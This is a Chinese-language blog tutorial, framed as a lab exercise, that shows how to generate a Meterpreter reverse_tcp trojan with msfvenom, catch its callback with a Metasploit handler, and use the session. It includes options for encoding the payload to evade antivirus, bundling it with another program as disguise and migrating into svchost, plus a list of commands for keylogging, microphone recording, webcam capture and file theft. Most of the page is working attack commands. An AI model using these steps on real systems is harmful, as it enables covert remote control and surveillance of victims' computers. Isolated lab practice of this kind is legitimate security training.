实验环境:
靶机Windows server 2003 192.168.242.129
攻击机kali 192.168.242.131
实验工具:Metasploit Framework(MSF)
实验过程:
确定攻击机和靶机之间连通性
利用msfvenom生成远控木马
msfvenom是msfpayload,msfencode的结合体,可利用msfvenom生成木马程序,并在目标机上执行,配合meterpreter在本地监听上线。
可以使用msfvenom -h查看所有参数
常用参数
–p (--payload-options): 添加载荷payload。 --lhost:监听的地址 --lport:监听的端口 –a: 选择架构平台 x86 、x64 、 x86_64 --platform: 选择平台,windows、Linux –e: 使用编码进行免杀,如使用 x86/shikata_ga_nai 编码 –i: 编码的次数 –b: 避免使用的字符 例如:不使用 '\x00\'。 PrependMigrate=true PrependMigrateProc=svchost.exe: 使这个木马默认会迁移到 svchost.exe 进程 –f : 输出文件格式,如 exe、c、elf、macho、raw、asp、aspx、 –l: 查看所有payload encoder nops。 –o: 文件输出 –s: 生成payload的最大长度,就是文件大小。 –c: 添加自己的shellcode –x | -k: 捆绑,可以指定捆绑的程序进行伪装;
使用msfvenom生成木马
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.242.131 lport=4444 -f exe -o hack.exe #lhost是攻击机的主机ip,lport是攻击机的用于监听的端口
成功生成hack.exe木马程序
使用MSF监听木马反弹过来的shell
msfconsole //启动 use exploit/multi/handler //开启监听 set payload windows/meterpreter/reverse_tcp //设置payload,选择漏洞利用模块,跟生成木马的payload对应 set lhost 192.168.242.131 //本地IP,即攻击IP set lport 4444 //监听端口 exploit //攻击
启动msfconsole,并配置好payload
想办法把hack.exe放到靶机上运行(木马复制到靶机,或者开启http服务下载木马都可以)
MSF执行exploit,靶机执行木马程序
成功监听到shell,可以控制目标服务器
常用命令
getuid 查看当前权限 getsystem 尝试获取system权限 shell 获取当前权限shell会话 ps 列出正在运行的进程 pkill 按名称终止进程 kill 按PID终止进程 reboot 重启 shutdown 关机 upload 上传文件(格式参考:upload /root/1.txt -> d:/) download 下载文件(格式参考:download c:/1.txt -> /root/) keyboard_send 令对方键盘输入(参考格式:keyboard_send ilovecc) #请按以下顺序执行 keyscan_start 开始捕获击键(开始键盘记录) keyscan_dump 转储按键缓冲(下载键盘记录) keyscan_stop 停止捕获击键(停止键盘记录) #操作完都会有文件保存在服务器,一般是存在/root目录下,msf会提示具体位置和名称,提到本机就可打开看 record_mic 麦克风录制(格式参考:record_mic -d 13) screenshot 截图截取对方目前桌面的截图 webcam_snap 摄像头拍摄一张照片 webcam_stream 持续监控摄像头标签:exe,payload,远控,木马,msfvenom,MSF,监听 From: https://www.cnblogs.com/byzd/p/17828162.html
参考链接:
MSF生成木马实现远控 - ʚɞ无恙 - 博客园 (cnblogs.com)
【精选】msf-Msfvenonm生成后门木马-CSDN博客